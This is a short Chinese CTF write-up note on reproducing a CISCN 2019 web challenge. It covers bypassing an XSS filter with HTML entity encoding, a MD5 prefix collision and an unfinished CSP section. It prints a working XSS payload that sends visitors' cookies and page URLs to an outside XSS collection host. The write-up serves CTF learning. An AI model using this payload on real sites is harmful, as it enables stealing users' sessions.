復現題目[CISCN 2019 華東北賽區 Web2 WriteUp](https://www.zhaoj.in/read-6100.html)的一些東西


以前一直沒做過xss的題,這次按writeup做題感覺有所收獲,記錄一下吧

  1. xss 的waf的繞過

    ()都被過濾,把所有的payload轉為HTML Markup,其實就是&#加ascii碼

  2. payload

    <svg><script>eval&#40&#34" + output + "&#34&#41</script>
    

    output就是下面的東西轉化為HTML Markup編碼的東西,這是XSS Platform這個平台自帶的payload,一開始沒看懂,整理一下代碼格式

    (function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0
     &location='+escape((function(){try{return document.location.href}catch(e){return''}})())+
     '&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+
     '&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+
     '&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();
    

    很清晰了,document.cookie 這樣操作得到一些數據直接get請求到xss平台

    可以試試直接訪問http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&cookie=123

    (id要換成自己項目的)

    在相應的項目下會收到對應的cookie:1234

    自帶的還有很多payload,也可以分析一下,以前一直沒成功過,這次終於成了一次,hhh,還有點小激動

  3. CSP繞過

    這里我過兩天補,還沒搞清楚

  4. substr(md5($str), 0, 6) === “d05a29”

    哈希碰撞與生日攻擊

  5. 感覺還有很多沒寫!!!待補充


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM